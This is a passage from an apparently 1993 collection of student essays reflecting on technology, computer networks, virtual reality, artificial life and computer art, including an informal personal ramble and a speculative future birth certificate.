body of society and +culture. The effects will not truly be known until the blood +cells (people) accept the medication (technology) or reject the +illness (technology). Currently, the capabilities of medication +(e.g. LSD in the 60s) and illness (AIDS in the 90s) are without +boundaries. Analogous to technology, the mind altering drug of +LSD and the killer disease of AIDS are flourishing, capable of +influencing the fate of the mankind. If technology didn t +progress, history would not exist and time would not advance into +the next minute or day. The stagnant environment would not yield +any unusual events or occurrences. However, reality is the +advancement of time and technology. The future effects of +technology on society and culture will never be know, but we can +only theorize, visualize, and imagine. + +WORKS CITED + + + +Smart, Barry. MODERN CONDITIONS, POSTMODERN CONTROVERSIES, + Routledge, London, 1992. + + + +---------------------------------------------------------------- + + + + TECHNOLOGY + + + The effects of modern technology on contempory culture and +society are far-reaching and have irrevocably changed the way in +which we view ourselves, and the world around us. Technology has +profoundly affected us psychologically, socially, physically, and +emotionally. It has influenced the way in which we interact with +each other and with computers, and has drastically changed the +way in which we continue to develop. Gradually, we have come to +see the world as an entire global community that is linked +through computers and other communication systems. Because of +technological advances it is now as easy to exchange ideas with +someone in China as it is with the person next door. Advances +have also been made in the computer programs that deal +specifically with visual art and design. One can also see the +advances made in fields like Cybernetics, Virtual reality, and +artificial intelligence. Yet these advances are not without +drawbacks; for, the human factor tends to be left out of the +equation and makes information exchange impersonal and isolating. +The technological progression that has occurred in the last one +hundred years has far outstripped the advances made in the +previous one thousand years and with each new development +hundreds of possibilities arise for further advancement. + + The technological breakthroughs made in the last twenty +years have affected us immeasurably. Within the framework of +communication systems alone, the socialization of humankind is +irrevocally changed. We no longer see borders between nations as +psychological deterrents; merely as physical barriers. We can +communicate with people in other nations as easily as we do with +those we find within our own circle. Entire databases and +networks have been set up to encourage communication and +information exchange between a diverse range of participants. +Telnet, Gopher, Mail Art, and Internet are just a few examples of +services developed to promote and expand the concept of +individual expression and facilitate the access to a vast array +of information available in the computer age. + + Computer networking is one of the fasted growing +opportunities in the computer field. It allows for a vast array +of different information to be accessed immediately at one's +fingertips, Telnet alone has over 4 000 different topics ranging +from weather and travel information to science and politics . +Once hooked up to the network, the user can access different +"conferences" and can send and receive electronic mail. While +using Telnet, I was able to access very diverse material, and +receive information on architecture and design, as well as +"conferenced" with a company that is sponsoring a design student +exchange between different Universities. The quantity and +variety of information that can be accessed is amazing, and it is +growing yearly as more and more people and companies connect to +networks. + + Over and above of dealing strictly with information +exchange, networks also exist to expose artwork and other +creative fields to the general public. The International Network +Culture endeavors to eliminate the divisions between viewers and +participant, and artists and non-artists, while providing the +structure for ongoing global artistic interaction. Socially +speaking, it has linked a variety of people,(students, teachers, +professional artists, etc.) who come from different locations and +sociological backgrounds, who otherwise would never have +interacted. This type of networking culture is a new movement +which challenges the conventional meanings of art and literary +expression and acknowledges art to be more interactive. The +intrinsic value of this democratic system of personal expression +allows for individuals to concentrate on aesthetic and creative +concerns and not on status or political concerns. + + Cyberspace is a computer generated space that humans can +enter and interact within. Cyberart, created in cyberspace, +therefore has no physicality like real art, and it is more +democratic in the sense that it is created and expressed on a +unilateral and not on a hierarchical level. Because it is new +there is no hard and fast rule defining cyberspace. As more and +more people get on-line to networks and bulletin boards, the +governing of cyberspace--who will be allowed access to what and +where and for what cost are questions that will need answers. +The majority feel that the broader the base of a non-hierarchical +self-governing body, the more it would adhere to the premise +behind cyberspace; namely, individual rights and equal access. +However, it is all a question of logistics, control, and money. +Because there are millions of people who are on-line to networks, +there is a great deal of money at stake and the question is who +(what companies) will have a monopoly on the service. As services +continue to develop one must also look at expansion in a +direction that favours two-way networking which favours a more +democratic decentralized system. This decentralization can also +be seen in today's computer companies. With the expansion of a +more global market, companies are now specializing in specific +areas. This also allows for competion among groups dealing in +specific arenas which in turn enables the consumer a wider +variety of choices. + + A new network being developed that has a great potential and +will offer many benefits is ISDN., Integrated Services Digital +Network. It is a set of digital protocols which enables the +movement of information, both voice and video, over regular +telephone wires at a faster speed than can be achieved by a +modem. The possibilities could include video conferencing and +electronic mail, and other information to be transferred from +home, and portable sites that as of yet are not as accessible as +the office environment. This type of infrastructure will allow +for greater flexibility and freedom of where and when information +can be sent and received at very rapid rate. As of yet, ISDN is +not readily available, but alliances are forming between computer +and phone companies in order to establish the groundwork for +local, national, and international access-- in essence, to +establish a "information super-highway". + + The way in which computers have become integrated into our +daily life has made us become more and more dependent on them. +The psychological and emotional impact of the "computer age" has +been far-reaching and has challenged the way in which we view +the world. One of the main psychological concerns caused by the +increasing role that computers play in our lives is Fear. + + + "The real danger is not that + computers will begin to think + like men, but that men will + begin to think like computers" + -Sydney J. Harris + + According to a report in "Omni" magazine, computer +scientists at the Massachusetts Institute of Technology stated +"....we are rapidly losing, have perhaps already lost, physical +and mental control of our society." (According to Dr. Joseph +Weizenbaum). Generally, the level of fear is most prevalent +among older people, because the younger generation have become +familiar with computer skills and programming. These are being +intergrated into the educational system. Yet, "computerphobia" +persists to be a major stumbling block in the path of technology. +There are a various rationalizations behind this fear; some +people are afraid of losing jobs, as more and more complex +machines are being developed that can do the work cheaper and +more efficiently. Others become overwhelmed and feel +insignificant and view the entire computer field as +incomprehensible and threatening. There is such an overpowering +array of different computers, programs, information, plug-ins, +printers, etc., available, that it is hard to even begin to +understand were to begin, let alone become proficient in the +computer age. However the most compelling fear we face is that +computers will become too powerful and man will no longer be in +control. This general idea is even played out in major Hollywood +movies i.e. "The Terminator". + + "Modern man is the victim of the very instruments he values +most. + Every gain in power, every mastery of natural forces, every + scientific addition to knowledge has proved potentially +dangerous, + because it has not been accompanied by equal gains in self + understanding and self discipline. + -Lewis Mumford + + Modern technology also has a physical impact on our lives. +In light of the fact that now millions of people sit in front of +a computer terminal for hours at a time day after day, +regulations have been passed limiting the amount of time a person +can sit in front of a screen without a break. There is an +increased awareness of the effects of electromagnetic fields +that are given off from monitors and are strongest within two +feet of the monitor. To date there has not been a comprehensive +long-term study of the physical ramifications of the field. +There are also studies that indicate that there are increased +cancer rates for people regularly exposed to radiation and an +increased rate of miscarriages.(Brodeur, Paul, Currents of Death: +power lines, computer terminals, and the attempt to cober up +their threat to your health) Luckily, there is an increased +awareness and new advances in monitor design that help shield the +user from excess radiation. Other physical problems that occur +with the computer are dizziness, headaches, and eyestrain. These +are caused by flickering or unclear screens or by glare, yet +these too can be relieved by using antiglare screens and proper +lighting. A lesser known physical problem is known as repetitive +stress injury; found when one does the same thing over and over +again. This can have a damaging effect on various parts of the +body. Lower back pain can be relieved by getting up and changing +positions frequently. Another common ailment is pain in the +wrists, hands and arms; variations on keyboard design and +placement are being reviewed but no solution has yet been found +that completely relieves the problem.. + + With the advent of video cameras, computer imaging, and +desktop publishing, etc, we can "immortalize" ourselves, our +actions, and our thoughts. Psychologically, this has had a great +impact on they way we perceive our limitations as human beings. +Now, we are no longer even limited to reality as we know it. With +the recent explosion in the direction of Virtual reality, +technology has taken us into a field never before explored. +Virtual reality will have many applications and uses in the years +to come. The technology allows the user to move through +computer-generated images (with the use of a helmet) in a three +dimensional world, which is super-imposed on the "real world". +For example one could be a mountain climber or become the main +character in a video game. Designers of Virtual reality +software are also working on programs that will make television +an interactive and not just a passive activity. While, the +equipment is still not as refined as programmers' wish, the +advances in technology have been amazing. Virtual reality will +have many other applications as well as belonging to recreational +arenas. It will be a great educational tool that will be seen in +operating rooms and in many types of very specialized +simulations. By the end of this century, the field of Virtual +reality will be so diverse and will open up avenues, as yet +unheard of. + + Cybernetics: (neural modelling) the science of control and +communications systems founded on the theory that intelligent +beings adapt to their environments and accomplish goals by +reacting to feedback from their surroundings. The premise behind +cybernetics is based on human neural networks, the fact that one +can learn, generalize, and hypothesize. The objective is to +create self-organizing machines, ones that can adapt and learn. +However, the difference in capabilities between biological +information-processing systems and computers remains extensive. +In biological networks, it is through innate properties and +through learning that humans are able to respond to specific +stimuli. In effect, each individual neuron is its own decision +maker and memory storer. The one great advantage we have over +any artificial intelligence is our resilience, damage caused to a +few neurons will not shut down our entire memory or +information-processing mechanism. With an artificial system, +memory is stored with an arbitrary numerical address and can only +be accessed as such. Humans on the other hand have the ability +to retrieve memories through various methods, including content +association. The dream to achieve machine intelligence that is +parallel or greater than humankind still lies in the very distant +future; in the meantime, the complexity and versatility of +computer programs continue to develop rapidly. + + With the complexity of computers increasing exponentially, +the question arises: "Can artificial life be alive?" The +semantics of the sentence alone is question enough, yet is there +an answer? Thomas Ray is a biologist at the University of +Delaware. Three years ago, he started testing a model of +evolutionary principles created on a computer. He designed a +system called Tierra, which illustrated that evolution works just +as well in a computer system as in the real world. He created a +digital creature made up of a string of computer instructions +which he then introduced into the model. Within hours the single +creature proliferated, created a race of clones that lived, +evolved, and died and themselves spawned new groups of mutants. +Ray and other scientists believe that some electronic creatures +are more than imitating life, that they actually are alive. + + In the past decade, there has been a proliferation of +scientists working on computers who have produced systems with +digital creations that resemble plants and insects in a silicon +world. There is very little agreement among scientists about +what can be deemed alive, still many want to create what will +qualify as life forms. The Chaos Theory is an assumption that +computer-generated systems might actually mirror nature because +scientists have discovered that patterns and structures can even +be discerned in systems that appear to be totally disordered. It +is through the creation of artificial life that researchers +hope to discover "what is it in matter that enables it to have +such an innumerable variety of forms, including life"(Steen +Rasmussen, a Danish Physicist working at the Santa Fe Institute) + + The effect that advances in technology has had on art in +today's society is far-reaching and has irrevocably changed the +way in which think about visual art. In the last century, the +transformation that has occurred in the visual art world is +immeasurable. Western society no longer necessitates that art +must fit into the well defined category assigned to it years ago. +It does not have to be a framed painting, a piece of +representational sculpture, or a well presented piece of work. +Visual art is what the artist creates, whether it be a be on +paper or on a computer. The progress made to computer programs +and applications which enable artists to create a variety of +effects is astounding. New methods and techniques arise daily as +more and more people are experimenting with the plethora of +results that can be achieved with computer programs like +Photoshop, Superpaint, and Autocad. The advances made in +programs that relate to the realm of graphic design and +architectural design have transformed those fields irrevocally. +As an Interior Design student I have noted what computer programs +like Autocad and Minicad are doing to the design field, even the +way in which programs like Architecture and Interior Design are +being taught are affected. The basic drafting skills are still +required, yet curriculums are now being augmented with courses +dealing with computer-aided design. The field of graphic design +is also changing rapidly. The majority of advertisement, logos, +letterheads and all types of signage are now all being produced +on computers. It is not only the design fields themselves that +are affected by this new technology; western society's views on +what visual art is have changed. + + Today, anyone who has a computer and a simple drawing +program can now create visual art. Visual art is no longer +regulated to "artists" as it was in the days of the Beaux Art. +There are no longer clear rules deciding what is classified as +art and what is not. Who says that what one produces on a +computer program is any less artistic than what one creates with +pen and paper. When the field of photography was first developed +there was a lot of complaints and concerns dealing with whether +it should be considered and artistic field or not. There were +many painters who had trained for years to be able to replicate a +tree realistically on canvas who were dismayed at the idea that +photography was to be taken seriously as an art form. Yet with +time, as the consternation of a new and unknown field wore of f, +society came to accept photography as a legitimate artistic +statement of its own, and learned to value it accordingly. It is +also so with computer-generated visual art. + + People will become aware and learn to appreciate the quality +and caliber of the work being produced. A further benefit of +the advances made in computer design programs is the ability for +society as a whole to be able to create and contribute to the +field of visual art. Due to the great accessibility of design +and drawing programs, anyone with a home computer will be able to +produce an array of drawings, graphically altered images, and +architectural drawings. + + The effects of modern technology on society and contemporary +culture are phenomenal and immeasurable. They have altered the +way in which we view ourselves, and the changing world around us. +They have touched our psychological, social, and physical lives +and have greatly modified they way in which we develop. With the +unprecedented advances made in computerized communication systems +and networks even the way in which we interact with one another +and with computers is different than it was twenty years ago. +The world is now linked electronically and we have become one +giant global community. Technological advances have also +affected the fields of Cybernetics, Virtual Reality, artificial +life, and computer design programs. The transformation that can +be seen in the Art world is astronomical and has irrevocally +changed the way in which society views and values visual art. +The technological progression over the last hundred years have +been phenomenal and with each new technical discovery countless +possibilities arise for further advancement. + + +---------------------------------------------------------------- + + +Contemporary Culture (& Technology): +An Example of it More Than Anything Else + + +By R.K. Shaw +June, 1993. + + + It`s funny how we`re living in the past so much of the time. +The present, for me, has not just one finite meaning. We all +have different presents wrapped up within what we know of our own +culture and how much we partake in it and so much more. + And how about the Volkssport Association of British Columbia +display and beer garden down here at Market Square. I don`t know +what this is about beyond an accordion player in tall socks, a +pixie hat, and suspenders for his shorts. Or are those knickers? + I think they`re into hiking - them Volkenssporters. Come +from the Alps originally perhaps. Today they`ve got the centre +of attention, although I feel i`ve come after the peak of the +party. But maybe not at all. For an afternoon party it`s pretty +much come and go as you please. To PARTY does not seem to be the +big focus of the, the event? Is that what it`s called? My +shoulder`s sore & the sun is reflecting in my eyes. I think +Volkenssportees are in the blue shirts. Older they are than me +or, well me anyways. Oh, they`re some burgundy shirts as well. +A 10 & 20km walk was just announced for tomorrow (a way of +achieving visionary state of mind through walking? - an ancient +tradition?) and a walking tour of Market Square, Fantan Alley, +and Chinatown - but no points allowed for that one. Eleanor +Grant from Comox is now going up to receive a certificated for +13,000 km. John Grady has done 25 marathons and over 25,000 km +in 19 years. +Margy Limpy of Victoria, +Jerry Levine of Victoria, +and a few others. +Check out all the sun hats on the beer garden tables. +CLap Clap Clap +OH, Cathy Lean is there from Kelona, Washington. +And hey, how does anyone become an ambulence attendant anyways? + Actually that`s not that difficult a question to answer. +Either is grave diggers I suppose. Don`t beer gardens usually +have low fences around their parametres, you know, just to keep +in & keep out or what ever - FENCES, as I would say when Mike and +I discovered that Mini had pood in the tub. "Well you know cats, +CATS." All about cats explained in one word. + I guess he`s playing polkas. That`s a polka right? +Accordion equals Polka. Easy music. + + +SO, + About what I was going to tie this all into. Well just look +around - oh sorry, one more little divergence for a sec, it looks +like the Volkies are sponsored by Rockport. Walkers they are, +cool. +So yes, I just came from a bookstore where I flipped through a +sort of compilation sci.fi. comic + Whoa,one more Volky comment - He`s up holding the Canadian +flag - not a bad size one either - & what, come on, is +that it? - I`m waiting for him to at least flex his muscles but +yes no the flag is now back in its place on stage. Beer +gardens. + + And above the Guatemalan shop and over to the left one can +buy all the latest, freshest clothing. Rave wear & sort of skate +shit. That whole alternative to norm transition and all of its +labels shit... +"To all the girls I`ve loved before". Hey this guy must be good, +give him a digital delay sampler on his acorn and I`d listen +longer & around & around but for now I`ve got to go. When the +saturation point comes... + + +a few days later... + + I`m not always explicit and obvious with what I mean +because my meaning is, in a way, your meaning. You construct it +from that I throw together. This makes communication more +interesting and interactive. Although according to some trains +of thought, more linear ones perhaps, this way of communicating +isn`t plausible on an academic or definitive level. What i`m +talking about is taking place in a more creative or lucid +context. Often, making THINGS interesting is part of what +everything we construct is about. We are here, alive, so why not +think about stuff & talk about stuff & write about stuff and do +it and make it interesting while we`re here. Enlightenment is +boring, so balanced and harmonious and uninteresting. There you +have it, the answer to IT all. So now what, you`re alive, what +else is new. Just keep on living & working or what ever I +suppose. N`est-ce pas? And change too I guess. Throw that in +there as well. Change (or not) comes from growth or rather can +be growth, and if you like expanding (your mind and being lets +say) you learn form experiences and as a result change (or not) +because of them. You becomes a better, or rather, a different +person than you were from the last minute + or +half hour + + + or season + + + + or person + + +or colour + t-shirt or skin + +or experience +or emotion + or cloud + + + or scale + or life + + + + + or beach. + + + +Cause as they say... + + + + + + + + + + + + + + + + + + + So ypoorter was writing this thing she calls Everything Is +Fuct and I was thinking ya, + + + everything is fuct. + + + + + + + + + + + + + So? + + +Everything is fuct and nothing is fuct and everything is fuct. +But that`s what she was writing about, at least that`s what I +think. And I`m an authority, because I say so. I could say why +I'm an authority but I`ll talk about later. + + Now is later. Ha! How do you like that - quicker than a +polaroid, faster (perhaps) than money, more satisfying than - +well you might just not care so anyways-> + +AUTHORITY: Who gets it, how, about what, & why. + +I guess what bugs me most about authority is when it`s used +oppressively or down right for the negative - Negatively. +Authority, or knowledge (or not), can be used so, so productively +(?) (I`ll use that word rather than positively, as, i guess my +presuppositions are cropping up & in here - but hey, of course). + NOTE: My little positive/productive debate thang comes out +of this thought being relative to my own biases +and presuppositions preferences. They would be for, as I would +place them, on the positive, caring side +(interpret that as you wish, I do too). +Yet instead of being used to foster love, self realization and +empowerment for the benefit of yourself and other beings and +rocks or trees, authority could just as easily be used to +encourage and promote hate and self realization and self +empowerment for the benefit of other beings etc as well (although +probably for the benefit of others who look most like whoever`s +doing the talking. +I seem to be getting sidetracked (something which I like) a bit +too much perhaps. Or maybe there is just so much I want to say +that I get on to something else before I clearly and neatly +finish up with what I oh what ever. An outline and maybe some +more formal structure to this speel would make it more acceptable +on a standard essay format. But this is supposed to be informal +so I guess I`ll go with it. This paper/piece/essay is about what +I want to say and how I want to say it. It is also suppose to be +about contemporary culture and technology. The two, me and +contempo cult & tech, are bound in ways that I may or may not +talk about but probably will. Ok, so I guess I`m overwhelmed. +La tee da tee da. There are just a couple more things that I +wanted to mention. There was a snowboard add from a couple of +years ago that went something like this: "Don`t question +authority, ignore it." To further that I like: "Don`t question +authority, be it." I sort of got that from what Mr. Virtual +Reality, Jaron Lanier, was saying about Big Brother types +possibly wanting to control V.R. input like tapping a phone line. +He advocated becoming smarter or a better hacker than those who +try to "control" things. Sorry Jaron if that's not quite what you +were getting at but it is what I mean and well, meaning is +obscure isn`t it? + + I could say "that`s it" but no. Shall we continue? +I`ve very recently come to realize that I`m writing about the +future, and the very near past. I`m not used to doing this, or +at least used to looking at creativity in such a way. Normally +when ever I write it is not about things which are as of yet +undefined. This means that I am writing about nothing which is +now becoming something. This is just how technologies and +cultural movements are continually emerging, evolving, and being +defined. I can write about what is now happening in my world, as +far as I know, and what I am doing within it, as a part of it so +to speak. Often the more one knows the more one can partake. +But not always. For example, I can partake with what I know, but +of course not everywhere, well yes everywhere. My degree of +involvement is restricted or modulated by my ability to, so to +speak, speak the language. Or for others their ability to speak +my language. We are always partaking in our society to one +degree or another. By choosing not to partake you are partaking. + + NOTE: I use "you" instead of "one" sometimes (lots) because +even though it`s bad grammar I think it more directly +addresses you, the reader. Active inactivity. Or inactive +inactivity. Or even inactive activity. Defining. That`s it! +I`m talking about who is defining what is what. Which all ties +into authority. Got it? I sure do and don`t. But even that is +what I`m talking about. This might help: + +Music, group, & get together. Well like + + that`s +another thing but you know. Cause + + you know music is music. If you want to + + play music you can play music if you have + + the people you want to play music with +then +you can play music. Know what I mean? + -Bob Marley from Talkin` Blues. + + There is an active movement or cultural shift in importance +that is growing, or at least trying to. One with an enfaces on +the security of living as an individual, living with others how +you want to with respect and appreciation from those who surround +you. This can be a scary thought because I don`t want somebody +doing what they want if it means bad stuff. "Bad stuff" covers +alot and is culturally and personally specific. What I might +consider bad would of course be good to somebody else and even my +thoughts right here are culturally specific to some one who +chooses to live in a smooth transition, positive vibe, caring, +try to not be afraid to speak my mind but get along with other +people and things kind of way. I may have to rewrite that +sentence. So, because of the randomness of truth and meaning, +people may conflict and hey, why not allow for that? How? Well +I could talk a lot about that but it would just be me spouting +what I believe in and all of a sudden I feel strange about doing +that. But since that`s what i`m doing anyways, heck, why not? I +still feel kind of strange because I`m not used to saying what I +believe in to a potentially large (hello out there) audience. So +if i`m going to speak to YOU which includes all of you (ha) then +here we go. + + ME as pointer outer for a yet undefined cultural standpoint. +I don`t know how far it reaches. By this I mean that it might +just reflect back at me, or my friends, or my ecological region, +or country, age group, or race, or sexual orientation, or +economic bracket, or gender, or hair length, or level of formal +education, or experience, or yes so many of these things go in to +where I`m coming from but I know that already and acknowledge it. +Maybe our lack of a definition or label is what defines us. An +aware Slacker or active GenXer would be the closest term perhaps +(more about this later). People sometimes go through something +like this on a personal level but I`d like to see it happen on a +massive cultural scale. And I do, and don`t. It comes and goes. +One vibe becomes more prominent than another. Which is fine. +That is change, allow for it and you might not become bitter. +Remember that sometimes these thing work in cycles. I`m relying +on myself and on others of some what like mind to live daily in +such a way. I just read an Alice Walker book. "Resistance is +the secret of joy" it said. I am holding out you might say, +hanging on to my own terms, letting them change and adapt, but +trying to live life my way. Reminds me of an old Lover Boy song. +Yike. Resistance to being pushed and pulled around sometimes +means being pushed and pulled. But I would rather be respected +in my own place with out having to demand it. Who wouldn`t? And +all this shit is a big kaboodle in my brain. I care I suppose. +I care how people are doing (and the Earth for that matter). I +care about what kind of world I live in and you live in. I would +like to live with out having to lock my doors or any number of +other little yet significant things that split trust in our North +American culture. The systems, policies, and attitudes that put +people and the Earth in shitty positions (eg. poverty) are in +obvious need of change. Not only are companies and governments +being forced to change their environmental policies (not enough) +but I would like to think that those in control might actually +care about "tomorrow" more than just for economic reasons. This +may be too much to ask or hope for but this is in some weird way +how I'm trying to live daily. Banking on individual difference to +make a difference I guess. I like seeing it work though. In +little ways like recycling and using cloth shopping bags, your +own mug, and such. + New systems that are being developed need to allow for +humane based foundations. That is what is so interesting about +all the new technologies coming up. I see people still trying to +make a buck which is great (I guess) but also being conscious and +considering how these new things will positively and negatively +effect the environment, which of course includes us. + Do you ever notice that when you say something it could just +as easily be taken in exactly the opposite way from the way you +meant it. The Bible is a classic example. Interpretation is so +hinged upon context and language. I have no problem with this. I +like it. Chaos. What to believe what to believe. Those old +"objective" news reports, and scientific experiments, and +photographs they just don`t hold the same validity that they used +to if they ever really did. Maybe it is not necessarily their +validity that has changed so much as their absoluteness. They +are no longer the absolute authority or truth but now just one of +many points of view. But unfortunately whoever controls access +to the means of communication controls the content. As Jaron +Lanier said something about telephones being good because anybody +using one controls the content but not so with a TV. I have +nothing more to say and lots more to say. Lunch time? +BLaablablablablablabaaaalbbaaalaaablablablablab. I feel like +some feed back. + + Thank you Heather. Heather understands. We were wondering +though about the disparity between written and spoken words and +just how immensely different the two forms of communication are. +I`m hoping that you, the reader, will understand more or less +what i`m saying and meaning. But hey, you might not and that`s +ok. Written or spoken or otherwise I might not even know what +i`m doing. Ooou, this IS nutty. But that is what is so +contemporary (to me at least). Linear logic has become only one +of many approaches to looking at things. Go see the movie Slacker +if you haven`t already. It shows a lot of what different ways of +approaching one`s life are going on. The maker of the film, +Richard Linklater described a Slacker as: + +somebody who's not doing what`s expected of them. Somebody who`s +trying to live an interesting life, doing what they want to do, +and if that takes time to find, so be it" (from Mondo 2000 #9). + +That`s sort of what I was trying to get at earlier on. + + Now I would like to add in a few words and expressions that +i wanted to get into this essay(?) but that might not make it in +if I don`t do it right now. +Here they are: + +hip pouches, +Maslow`s hierarchy of needs, +Kiss My Grits, +plate of shrimp, +old cars, +new cars, +postmodernism, +deconstruction, +subjectivity of a kiss, +knowing, +fear, +love, +art, +hair, +the running of the goats, +fashion, +raves, +flow, +congas, +the orb, +vibe, +having a body, +not much else cept for music. + +And a few of quotations that have everything to do with what I'm +saying: + +"How did you get here?" +"Same way you did: space ship, Ape City, subway." + -Tyler to Brent in Beneath the Planet of the Apes + +"What ever you do, take care of your shoes." + -Phish + +"Pousse mon amour, pousse!" + -from Leolo + + To finish up with I`d just like to say that if anybody out +there has anything they`d like to say to me please do so. Here +is where nouveau technologies come in such as e-mail. Feedback on +a ramble like mine would be much appreciated. I`d just like to +know if anybody feels anything that I do. Via the wonders of +e-mail I can be found at: + + rkshaw@nero.uvic.ca. + + + peace, + + R.K. Shaw + + +---------------------------------------------------------------- + + + + IS THIS PROGRESS??? + + June ,1993 + + My insight of contemporary culture and technology is +looking globally and personally at how the future is fast +approaching.I wonder how prepared we really are? + Technology has been progressing over the past several years +blindly in the eyes of society. I could see that we`re in the +process of distroying the old world and building a new world in +its place, at least trying too. The light of technology has +become overwhelming, while our environment, economy,and education +are falling a part. Changes are occuring now and we tend to be +emotionally attached to our old ways of living rather than try to +open our eyes to change. Although we are in a higher level of +consciousness and awareness from mass media, and mass +communication, we`re losing control over work everywhere from +factories and offices to hospitals and retail stores,as +computerization is integrating in the stage of the systems. In +our work environment, we are being controlled by the systems +logic and are now becoming aware of this transformation and +implications. But are we prepared to make the change? +So far it looks as if our perception of technological change and +economic restructuring has been transformed from social and +political issues of massive unemployment, demeaning of work, and +loss of democratic control and personal independence into a +de-personalized, disembodied technocratic puzzle: how to +"manage" the "impacts" of restructuring; how to "adjust" people +as if they were numbers on a flow chart. + + + Its brought jobless employment growth in many plants +and offices and are reduced to unthinkable procedures by pressing +keys while technology does most of our thinking. Its as if we're +being filtered through unnecessary laborers of technology, all in +the value of the doller. +$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ + As uncertain as it may seem, technology is becoming +more of a reality. In my own personal experience I have had to +some what alter my career plans. I've felt like I have had to +start all over again. I realized that computers as another artist +medium tool would be an added skill to other artists like myself. +But to have computers as the device of all art mediums in the +future, I fear to question..? If technology dominates the medium +of our ancestrial artists it'll be like eliminating history of +its craft. To eliminate the craftmanship you eliminate the +physical technique and expression. I believe that technology is +blind in the understanding of personal experience and +expressions. For instance, if we were to look at a painting on a +computer screen, how would our perception of artificial image +compared to traditionally viewing of painting? + + + + + + +How can we see the artists instinctive physical approach to the +painting? I can't imagine how computer can transmit such +information. The only way would be to have the computer transmit +the mind of the artists. Artists would not have complete control +over his/her work with a computer. The process of mixing colour +is a process of creativity and satisfaction of discovering new +colour by physically mixing where as computers would be +artificial. Naturally you see the stages of development from the +beginning to the end piece as a whole,where as with the computer +your mousing about to find the final result. + Unfortunately I believe painting, +drawing,sculpture will become a thing of the past and more or +less it'll be a personal liesure activity ,but when I look +further ahead I try to imagine what painting will look to +computer graphics and special effects. Currently having used a +bit of the laser printer, I can see that in the near future, the +resolution on printouts will be as clear as photos, and that +amateur graphic artists will have medium to nun in design skills. +They can also become skillfull designers and layout artist. +Machines will play a major part in aiding creative skills and +expression to those with talent musically and artistically. +Artists will be even more highly regarded in the new age of art +but the traditional skilled artists will always be well +respected. + + + + + I've heard the latest in our media news about the new +visual reality in theatres and that audiences will become more +intensily involved with film, so much so that too many action +scenes could rapidly confuse illution of film with reality. How +much further will this virtual reality go? The thought of virtual +live T.V. would be amazing,but we would probably virtually not +want to live ourselves in our real world. + Currently I've had a taste of my own experience of +virtual reality, when I've finally decided to educate myself and +get over the computer intimidation, which has caused some anxiety +and frustration. This occured when I first sat in front of one of +these screen T.V.s wondering if the other students new little as +much as I did. I thought that going through some of the program +guides would be a breez, (So I thought) obviously didn't make +computing easy. I was anticipating instant results but all I was +getting - "Command not recognized" to "Don't understand" +The amount of time that it lit up the screen I was ready to put a +hole in the return key. "Now there's some vertual action for ya," +I made my exit so I could bring myself back together. Tolerence +and patience is definitely a virtue. I wanted answers no matter +how long it was going to take me. Having had some good tutorial +assistance, I found that it wasn't enough. I realized I was on +my own to explore the jungles of the Internet, FTP,Gopher and +EMAIL> etc. Having explored the programs I saw how this new +technology can and will open a whole new world of communication +and having access to new tools. (Not to worry I don't plan to +regurgitate the procedures) + I could see how this new technology has unlimited +possibilities that are unimaginative to human thinking. +Globally I wonder if this new technology will be beyond human +control or will we be considered technocratics in the 21st +century? Hmmmmmmm... + The thought of what 10, 20 years will bring is hard to +imagine really. Really in only seven years, will be in the year +2000. I can remember watching the future series 1999 in the +early 80's and to think that I'd still be here to see that year. +It's a fearing thought that in 1999 we could live such a cold and +sterile environment, wearing co-ordinated coloured uniform and +not being able to see the light of day. Everyone living in +uniformity and order with no sense of individuality. Yet six more +years, who's to say this fictional movie 1999 may hold some +truths. Interestingly, recently I read an article by Arther C. +Clark in which he has some interesting insightful predicaments +which I found it to be amazingly possible of what a birth +certificate would look like in the 21st century: + + + + + + + + + +---------------------------------------------------------------- +Commonwealth of California +Department of Health`s +Vital Records +CERTIFICATE OF LIFE +Subject: Baby boy, Miller +Date of Conception: November 15,2018; 12:15 P.M. +Place of conception: Comprehensive Fertility Institute, + Beverly Hills, California + +Number of Parents: Three, including surrogate mother- + mother donated egg, father sperm + +Method of Conception: In vitro fertilization followed by + embryo tranfer. Mother's body had + rejected her artificial falloian tube. + After 8 days on pergonal tablets, mother + produced 2 eggs. Both were removed + during routine laparoscopy and screened + for possible defects. Eggs united with +father's sperm. After 48 hours in incubator, +embryos were removed from growth medium +and placed in surrogate's womb. Only one +embryo attached itself to uterrine wall. + +Prenatal Care Ultrasound at 3 months. Fetal surgery + performed at 5 months to correct small + defect in bone of right foot. + +Date/Time of Birth: Jason Lawrence Miller born July 20, + 2019; 4:15 A.M. + +Father: Jason L.Miller,Sr. +Mothers: Amy Wong (natural), Maribeth River + (surrogate) + +Birth Method: Newly lifted in Morningstar Birthing + Center, division of Humana Corporation. + Natural delivery of Humana Corporation. + Natural delivery after 5-hours labor. + Labor pains controlled through + accupuncture. Therapeutic touch used for + last hour of labor . Child's father, +adopted sister, and natural mother +attended the delivery. + +Weight/Length: 10Ib.; 25 in. + +Eye Color: Green + + +Genetic Profile: Yunis Test show missing sub-band on + chromosome 5, indicating premature + graying of hair. Will be totally gray by + age 22. + Bands on one chromosome upside down; + could have fertility problems.Nicked + chromosome indicates a greater than + average vulnerability to lung cancer. + +High-Risk Professions: Any career that would expose +individual to possible lung +damage:painting, mining,etc. + + +Body Type: Mesomorph. Build well suited to +contact sports,such as football.To maximize + muscle development and athletic ability, + should begin exercise program by age 4. + +Prjected Life Span: 82 years + +----------------------------------------------------------------- + + + + + I wonder what the 21st century schools will be like. I +think we would constantly be training and retraining and +learning. Also early training will lead to greater educational +success later. For example, a grandmother taking a course in a +small business management where as her sixteen year old +grandson's getting 1st year college English early while in +Universities, students are taking classes in new technological +development in their field to advance fields in technical +science. The emphasis will shift to produce workers for the +industrial factory based economy which +required patience docility and ability to endure boredom. + Knowing that Robots technicians are now increasing in +demand, new fields will spring up as population increases and +workers jobs are eliminated by technology. This is obviously +happening even now where workers are having to go back to school +to prepare for careers in these new areas. Fortunately technology +will bring students a smorgasbord of educational choices for +students of all ages. I can see in the next generation how +schools will be partly financed by local industries that rely on +producing and training workers. Technology is transforming +society itself, in turn computers will take on schools. + Artificial intelligence in its infancy will probably +dominate education or even its growing stages that will probably +dominate education. + As I look further ahead in artificial intelligence +meaning robots will be able to see, listen, talk in all ranging +languages. They'll no longer be a simple-minded dumb insensate +machine found in factories producing lines. They'll move out of +manufactoring plants to working alongside us relaxing with us +and, live with us. Our homes will become roboticized with central +intelligence. They'll have control over the 